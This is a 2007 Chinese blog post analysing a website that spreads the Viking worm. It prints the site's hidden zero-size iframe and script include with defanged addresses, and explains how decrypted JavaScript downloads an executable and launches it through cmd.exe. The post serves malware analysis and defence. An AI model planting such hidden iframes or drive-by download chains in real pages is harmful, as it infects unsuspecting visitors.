发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖

最新推荐文章于 2024-05-02 18:12:22 发布
最新推荐文章于 2024-05-02 18:12:22 发布
阅读量2.3k 收藏
点赞数
分类专栏: 系统安全 文章标签: javascript 正则表达式 解密 iframe 加密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purpleendurer/article/details/1523472
版权

endurer 原创

2007-03-07 第1

该网站首页包含代码:

<iframe src=hxxp://www***1.8***93**8*2.cn/5***1**.htm width=0 height=0>

hxxp://www***1.8***93**8*2.cn/5***1**.htm 包含代码:
/---
<script src=css.js></script>
---/

hxxp://www***1.8***93**8*2.cn/css.js 的内容为JavaScript程序,使用正则表达式解密代码并运行。

解密出来的代码采用JavaScript编写,功能是利用 Microsoft.XMLHTTP 和
scrīpting.FileSystemObject 下载文件 down.exe,保存为 %windir%/~tmp.tmp,并利用Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

/---
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-7 20:22:38
修改时间 : 2007-3-7 20:23:51
访问时间 : 2007-3-7 20:25:16
大小 : 65427 字节 63.915 KB
MD5 : f066f58f878be37bcc53a096d61d05e8
---/

kaspersky 报为 Worm.Win32.Viking.if

后记:
这种网页代码加密技术还是第一次遇到,解密这段代码费了一会功夫。
调用cmd.exe来运行,也很新颖。

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
病毒之Worm.Win32.AutoRun
BYTEDANCE的博客
12-16 3738
解决Worm.Win32.AutoRun之暴力删除 Autorun.inf 文件,那年我双手插兜,不知道什么叫做对手
html.win32.scipt病毒,用vbs实现的一款Worm.Win32.VB.fw病毒专杀工具
weixin_35683614的博客
06-29 339
在写了《Worm.Win32.VB.fw分析与清除方案》后,也没想到要写什么专杀,不过这些天好多同学都说中了这只病毒,我要是一个一个去解决,非忙死我不可!感染范围挺大的!我之前写了一篇《VBS编程打造自己的病毒专杀工具》 ,VBS相对来说熟悉点,所以这次就用VBS来写个专杀吧……下面代码不懂的,请参考那篇介绍如何写自己的病毒专杀的文章吧。复制代码 代码如下:onerrorresumenext...
解决Worm.Win32.AutoRun.soq 病毒
LaySolitary的博客
06-05 5373
X: 回车  X盘符1.搜索attrib –s –r –a –h autorun.inf2.删除del autorun.inf3.回复文件attrib -H -S X:\* /s /d
如何解决Worm.Win32.AutoRun.bqn(文件夹改exe病毒)
qq_41342276的博客
05-16 5287
如何解决Worm.Win32.AutoRun.bqn(文件夹改exe病毒)代码或使用命令提示符 代码 //文件格式.bat //G:\是盘符,如果你的U盘中毒了请换为自己的盘符。 echo @echo off echo attrib –s –r –a –h autorun.inf >> G:\fix.bat echo del autorun.inf >> G:\fix.ba...
net.worm.win32.kido专杀工具
06-25
如果您的电脑没有最新的杀毒软件,或没有防病毒解决方案,您可以使用一个特殊的删除工具,它可以在这里找到support.kaspersky.com或按照以下步骤操作: 1、删除如下注册表项: [HKLM\SYSTEM\CurrentControlSet\...
安全相关-病毒防治-瑞星威金Worm.Viking病毒专杀工具 v1.6.zip
09-15
网络-计算机-安全相关
Net-Worm.Win32.Kido.ih 专杀工具
06-07
微软网站上不去 说明中毒了,可以用此工具杀一下
Win32/Conficker.AA蠕虫搜集资料
02-04
Win32/Conficker.AA ,也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络...
delphi Email-Worm.Win32.Canbis
05-02
delphi Email-Worm.Win32.Canbis
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 863
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
bpmn-js推荐几款常用的插件
飞云先生
04-30 117
bpmn-js整体框架库的风格是以组件的方式进行实现的,这样的结构也更加便于我们更好的对其进行功能扩展,以及客制化功能实现。其实bpmn.io已经为我们实现了较多场景的组件的实现,了解对应组件的功能更能便于我们区分是否需要自己实现,降低重复造轮子的行为,提高开发效率,本篇文章主要是介绍常见的bpmn-js中使用的组件库。
基于React实现B站评论区
最新发布
stu_kk的博客
05-02 904
使用React构建了一个仿照B站基本的前端评论系统,实现了动态加载、排序、添加和删除评论的基本功能。通过React的状态管理和事件处理机制,实现了交互式的用户体验。但是在实际应用中,还需考虑与后端接口的交互、错误处理、分页加载、以及更复杂的用户交互逻辑。
《ElementUI 基础知识》el-tabs header 监听鼠标中键滚动时左右滑动(ElementPlus同样适用)
前端技术
04-29 970
监听 el-tabs 头在鼠标 hover 时。滑动鼠标中键,可左右滑动!
表格隔行变色
weixin_54339833的博客
05-02 375
2.$(document).ready() 是 jQuery 中的一个函数,它确保在文档结构(DOM)加载完成后执行指定的代码。与原生 JavaScript 的 window.onload 不同,$(document).ready() 会在 HTML 文档结构被加载和解析完成后立即执行,而无需等待样式表、图片和子框架的完成加载。if (index % 2 === 0) { // 偶数行。if (i % 2 === 0) { // 偶数行。// 可以省略,因为默认背景色通常是白色。
echarts+百度地图如何定义边界线
abc8002117034的博客
04-30 305
5.setOption里面的参数option.series是echarts散点图的配置项,option.bmap是百度地图的配置项,比如center是当前地图的中心点,zoom是缩放数值,roam是是否可以缩放,mapStyle是地图的样式。3.方法getCenterPoint是获取当前区域中心点的经纬度,我们将会在区域的中心点显示区域名称和具体数值。4.方法convertData返回的是地图上红色散点里面的数据,是对idata的数据格式做的一层转换。2.变量styleJson是地图的样式,可以去。
redux快速入门
qq_73270720的博客
04-29 339
简单的加减案例,学会redux快速入门
js执行顺序
weixin_45392204的博客
04-29 344
同步任务:指的是在主线程上排队执行的任务,只有当前一个任务执行完毕,才能执行下一个任务(按照顺序执行)异步任务:指的是不进入主线程上的任务,进入任务队列的任务,只有当任务队列通知主线程某个异步任务可以执行,方可进入主线程进行执行。异步任务又分宏任务跟微任务宏任务:异步ajax请求、setTimeout、setInterval、文件操作、其他微任务:Promise.then、.catch 和.finally,process.nextTick、其他。
react核心知识
qq_16546829的博客
04-29 701
Fiber架构中处理副作用(side effects)时采用自下而上的方式,这是为了实现更高效的调度和渲染过程,以及更好地支持优先级调度和中断。在Fiber架构中,每个React组件都可以被视为一个fiber节点,这些节点以树状结构组织,形成了React组件树。在渲染过程中,React会遍历整个组件树,并根据需要执行各种操作,比如计算Virtual DOM、处理更新、执行副作用等。异步调度和优先级:自下而上的处理副作用可以更好地支持React的异步调度和优先级调度。
Worm.wantjob.57345 “求职信”手工清除的方法
05-11
Worm.wantjob.57345 是一种恶意软件,它会通过电子邮件或其他方式传播,尝试感染您的计算机。如果您的计算机已经感染了这种恶意软件,您可以采取以下步骤手动清除它: 1. 关闭所有正在运行的程序和文件,并断开与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值